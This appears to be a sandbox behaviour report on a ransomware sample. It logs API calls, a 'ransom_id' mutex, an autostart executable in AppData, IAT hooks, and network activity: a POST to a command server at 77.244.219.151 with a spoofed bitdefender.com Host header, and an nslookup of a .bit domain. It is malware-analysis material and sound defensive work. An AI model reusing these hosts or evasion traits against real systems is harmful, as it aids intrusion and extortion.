Get Name - load_address = 1819672576 True 1
Fn
Get Name - load_address = 1820393472 True 1
Fn
Get Name - load_address = 1820983296 True 1
Fn
Get Name - load_address = 1821179904 True 1
Fn
Get Name - load_address = 1821507584 True 1
Fn
Get Name - load_address = 1821638656 True 1
Fn
Get Name - load_address = 1822162944 True 1
Fn
Window (249)
»
Operation Window Name Additional Information Success Count Logfile
Find vetigisoliwomo ki class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga False 249
Fn
System (11)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = X2VS1CUM True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Sleep duration = -1 (infinite) False 1
Fn
Get Time type = System Time, time = 1627-01-28 15:07:34 (UTC) True 1
Fn
Get Time type = Ticks, time = 131812 True 1
Fn
Get Time type = Ticks, time = 141890 True 1
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 3
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=58de2295a283c81 True 1
Fn
Environment (252)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Get Environment String name = AppData, result_out = C:\Users\Nd9E1FYi\AppData\Roaming True 1
Fn
Set Environment String name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo True 249
Fn
Ini (250)
»
Operation Filename Additional Information Success Count Logfile
Read Section Win.ini section_name = hozavofoja xewuwozeyugisehatuzagito cuheleta tofexu, data_out = ˆewè\ÈH False 250
Fn
Network Behavior
HTTP Sessions (2)
»
Information Value
Total Data Sent 566 bytes
Total Data Received 566 bytes
Contacted Host Count 2
Contacted Hosts ipv4bot.whatismyipaddress.com, 77.244.219.151
HTTP Session #1
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 14
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 14 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 4
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 77.244.219.151
Server Port 80
Data Sent 271
Data Received 552
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 77.244.219.151, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = seyst, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 77.244.219.151/seyst True 1
Fn
Data
Read Response size = 204798, size_out = 552 True 1
Fn
Data
Read Response size = 204798, size_out = 0 True 1
Fn
Close Session - True 4
Fn
Process #7: nslookup.exe
8 17
»
Information Value
ID #7
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup politiaromana.bit ns1.virmach.ru
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:58, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:02:25
OS Process Information
»
Information Value
PID 0xb74
Parent PID 0xfd8 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x ACC
0x BD4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00021fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00044fff Pagefile Backed Memory Readable True False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory Readable True False False -
private_0x00000000000f0000 0x000f0000 0x000f1fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x0013ffff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x0017ffff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x001a0fff Private Memory Readable, Writable True False False -
private_0x00000000001b0000 0x001b0000 0x001b0fff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x003fffff Private Memory Readable, Writable True False False -
locale.nls 0x00400000 0x004bdfff Memory Mapped File Readable False False False -
pagefile_0x00000000004c0000 0x004c0000 0x00647fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000650000 0x00650000 0x007d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007e0000 0x007e0000 0x00bdafff Pagefile Backed Memory Readable True False False -
private_0x0000000000e40000 0x00e40000 0x00e41fff Private Memory Readable, Writable True False False -
private_0x0000000000e40000 0x00e40000 0x00e43fff Private Memory Readable, Writable True False False -
private_0x0000000000e70000 0x00e70000 0x00e7ffff Private Memory Readable, Writable True False False -
imm32.dll 0x00e80000 0x00ea9fff Memory Mapped File Readable False False False -
private_0x0000000000fd0000 0x00fd0000 0x010cffff Private Memory Readable, Writable True False False -
nslookup.exe 0x01380000 0x01396fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x00000000013a0000 0x013a0000 0x0539ffff Pagefile Backed Memory - True False False -
pagefile_0x00000000053a0000 0x053a0000 0x0679ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x067a0000 0x06ad6fff Memory Mapped File Readable False False False -
wow64win.dll 0x5d0b0000 0x5d129fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x5d130000 0x5d17ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x5d180000 0x5d187fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x6f8c0000 0x6f8cafff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x6f8d0000 0x6f8e3fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x6f8f0000 0x6f905fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x6f910000 0x6f921fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x71770000 0x717b6fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x717c0000 0x717c7fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x717d0000 0x717fefff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x71810000 0x71893fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x718a0000 0x718eefff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73a50000 0x73a6afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73da0000 0x73da9fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73db0000 0x73dcdfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x741e0000 0x74237fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75650000 0x75693fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x756a0000 0x7575dfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75900000 0x7592afff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75bf0000 0x75ccffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x75ef0000 0x75f9cfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76110000 0x76256fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76390000 0x7650dfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76510000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76690000 0x76696fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76710000 0x7685efff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77080000 0x771fafff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f0a0000 0x7f0a0000 0x7f19ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f1a0000 0x7f1a0000 0x7f1c2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfc173fffff Private Memory Readable True False False -
pagefile_0x00007dfc17400000 0x7dfc17400000 0x7ffc173fffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc175c1000 0x7ffc175c1000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x1380000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = x2vS1cum True 1
Fn
Resolve Name host = ns1.virmach.ru, address_out = 109.234.35.56 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 114 bytes
Total Data Received 202 bytes
Contacted Host Count 1
Contacted Hosts 109.234.35.56:53
UDP Session #1
»
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 44 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 44 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 51 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 51 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 107 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 107 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #9: roamingqtp35.exe
9240 38
»
Information Value
ID #9
File Name c:\users\nd9e1fyi\appdata\roamingqtp35.exe
Command Line "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:01, Reason: Autostart
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:01:22
OS Process Information
»
Information Value
PID 0xd40
Parent PID 0x638 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x D44
0x D50
0x D70
0x D84
0x D88
0x D8C
0x D90
0x D94
0x D98
0x D9C
0x E30
0x E34
0x F20
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000040000 0x00040000 0x00054fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x0006ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000060000 0x00060000 0x00064fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00183fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00174fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
private_0x0000000000190000 0x00190000 0x00190fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001d3fff Private Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x001f5fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000200000 0x00200000 0x003fffff Private Memory Readable, Writable True False False -
roamingqtp35.exe 0x00400000 0x0044afff Memory Mapped File Readable, Writable, Executable True True False
...
locale.nls 0x00450000 0x0050dfff Memory Mapped File Readable False False False -
private_0x0000000000510000 0x00510000 0x0054ffff Private Memory Readable, Writable True False False -
private_0x0000000000550000 0x00550000 0x00573fff Private Memory Readable, Writable True False False -
private_0x0000000000550000 0x00550000 0x0058ffff Private Memory Readable, Writable True False False -
private_0x0000000000590000 0x00590000 0x00590fff Private Memory Readable, Writable True False False -
private_0x00000000005a0000 0x005a0000 0x005affff Private Memory Readable, Writable True False False -
private_0x00000000005b0000 0x005b0000 0x006affff Private Memory Readable, Writable True False False -
private_0x00000000006b0000 0x006b0000 0x0074ffff Private Memory Readable, Writable True False False -
private_0x00000000006b0000 0x006b0000 0x006b0fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x006b0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000006c0000 0x006c0000 0x006c0fff Private Memory Readable, Writable True False False -
private_0x00000000006d0000 0x006d0000 0x006d0fff Private Memory Readable, Writable True False False -
private_0x00000000006e0000 0x006e0000 0x006e0fff Private Memory Readable, Writable True False False -
private_0x00000000006f0000 0x006f0000 0x006f0fff Private Memory Readable, Writable True False False -
private_0x0000000000700000 0x00700000 0x00700fff Private Memory Readable, Writable True False False -
private_0x0000000000710000 0x00710000 0x00710fff Private Memory Readable, Writable True False False -
private_0x0000000000720000 0x00720000 0x00720fff Private Memory Readable, Writable True False False -
private_0x0000000000730000 0x00730000 0x00730fff Private Memory Readable, Writable True False False -
private_0x0000000000740000 0x00740000 0x0074ffff Private Memory Readable, Writable True False False -
private_0x0000000000750000 0x00750000 0x00750fff Private Memory Readable, Writable True False False -
private_0x0000000000760000 0x00760000 0x00760fff Private Memory Readable, Writable True False False -
private_0x0000000000770000 0x00770000 0x0077ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000770000 0x00770000 0x00774fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000770000 0x00770000 0x00770fff Private Memory Readable, Writable True False False -
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000880000 0x00880000 0x00a07fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a10000 0x00a10000 0x00b90fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000ba0000 0x00ba0000 0x01f9ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001fa0000 0x01fa0000 0x0208ffff Private Memory Readable, Writable True False False -
private_0x0000000001fa0000 0x01fa0000 0x01fb3fff Private Memory Readable, Writable True False False -
pagefile_0x0000000001fa0000 0x01fa0000 0x01fa0fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x01fb0000 0x01fb0fff Memory Mapped File Readable, Writable True True False
...
private_0x0000000001fc0000 0x01fc0000 0x01ffffff Private Memory Readable, Writable True False False -
private_0x0000000002000000 0x02000000 0x02002fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002000000 0x02000000 0x02017fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002010000 0x02010000 0x02012fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002020000 0x02020000 0x0205ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002060000 0x02060000 0x02060fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000002070000 0x02070000 0x02070fff Pagefile Backed Memory Readable True False False -
private_0x0000000002080000 0x02080000 0x0208ffff Private Memory Readable, Writable True False False -
private_0x0000000002090000 0x02090000 0x02190fff Private Memory Readable, Writable True False False -
private_0x0000000002090000 0x02090000 0x0221ffff Private Memory Readable, Writable True False False -
private_0x0000000002090000 0x02090000 0x0218ffff Private Memory Readable, Writable True False False -
private_0x0000000002190000 0x02190000 0x021cffff Private Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x0220ffff Private Memory Readable, Writable True False False -
private_0x0000000002210000 0x02210000 0x0221ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02220000 0x02556fff Memory Mapped File Readable False False False -
pagefile_0x0000000002560000 0x02560000 0x0295afff Pagefile Backed Memory Readable True False False -
ole32.dll 0x02960000 0x02a49fff Memory Mapped File Readable False False False -
private_0x0000000002960000 0x02960000 0x02a5ffff Private Memory Readable, Writable True False False -
private_0x0000000002a60000 0x02a60000 0x02b5ffff Private Memory Readable, Writable True False False -
private_0x0000000002b60000 0x02b60000 0x02c5ffff Private Memory Readable, Writable True False False -
private_0x0000000002c60000 0x02c60000 0x02d5ffff Private Memory Readable, Writable True False False -
private_0x0000000002d60000 0x02d60000 0x02d9ffff Private Memory Readable, Writable True False False -
private_0x0000000002da0000 0x02da0000 0x02e9ffff Private Memory Readable, Writable True False False -
private_0x0000000002ea0000 0x02ea0000 0x02edffff Private Memory Readable, Writable True False False -
private_0x0000000002ee0000 0x02ee0000 0x02fdffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002fe0000 0x02fe0000 0x02feffff Pagefile Backed Memory Readable True False False -
private_0x0000000002ff0000 0x02ff0000 0x02ff0fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000003000000 0x03000000 0x03000fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000003000000 0x03000000 0x03008fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000003010000 0x03010000 0x03055fff Private Memory Readable, Writable True False False -
private_0x0000000003010000 0x03010000 0x03010fff Private Memory Readable, Writable True False False -
private_0x0000000003020000 0x03020000 0x03020fff Private Memory Readable, Writable True False False -
private_0x0000000003020000 0x03020000 0x03021fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000003060000 0x03060000 0x03060fff Private Memory Readable, Writable True False False -
private_0x0000000003070000 0x03070000 0x03070fff Private Memory Readable, Writable True False False -
private_0x0000000003080000 0x03080000 0x03080fff Private Memory Readable, Writable True False False -
wow64win.dll 0x542b0000 0x54329fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x54330000 0x5437ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x54380000 0x54387fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x6f970000 0x6fa2efff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x6fa30000 0x6fa5efff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x6fa60000 0x6fa72fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x6fbd0000 0x6fbe8fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x6fc70000 0x6fc77fff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x6fcf0000 0x6fd8afff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x6fd90000 0x6fda1fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x6fdc0000 0x6ffccfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x6ffd0000 0x7014dfff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x71540000 0x71586fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x71590000 0x71597fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x715a0000 0x715cefff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x715d0000 0x71653fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x71660000 0x716aefff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x71720000 0x719eafff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73860000 0x7387afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73bb0000 0x73bb9fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73bc0000 0x73bddfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x73be0000 0x73be6fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x73bf0000 0x73dacfff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x73db0000 0x73dbbfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x73ee0000 0x73f71fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x73f80000 0x73fc3fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x740c0000 0x7411efff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74120000 0x741fffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x74300000 0x743bdfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74530000 0x7455afff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x74560000 0x74565fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74610000 0x746bcfff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x746c0000 0x74bb8fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x74bc0000 0x74c4cfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74c50000 0x74dc7fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x74f10000 0x74f54fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74f60000 0x74f6efff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74fd0000 0x75027fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75090000 0x750d3fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x750e0000 0x764defff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x764e0000 0x7662efff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76630000 0x766b3fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x766c0000 0x7683dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76840000 0x76986fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x76dc0000 0x76e3afff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x76e40000 0x76e76fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76e80000 0x76e8dfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x76e90000 0x7700afff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff9abbfffff Private Memory Readable True False False -
ntdll.dll 0x7ff9abc00000 0x7ff9abdc0fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9abdc1000 0x7ff9abdc1000 0x7ffffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 216 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000780000:+0x696cc 11. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetCommTimeouts+0x0 now points to private_0x000000007fff0000:+0x51fd5215
...
IAT private_0x0000000000780000:+0x696cc 15. entry of roamingqtp35.exe 4 bytes kernel32.dll:CompareStringA+0x0 now points to private_0x000000007fff0000:+0x52ddfb55
...
IAT private_0x0000000000780000:+0x696cc 20. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteConsoleW+0x0 now points to private_0x000000007fff0000:+0x7b046002
...
IAT private_0x0000000000780000:+0x696cc 21. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetConsoleOutputCP+0x0 now points to private_0x000000007fff0000:+0x7516097b
...
IAT private_0x0000000000780000:+0x696cc 22. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteConsoleA+0x0 now points to private_0x000000007fff0000:+0x2046cd6
...
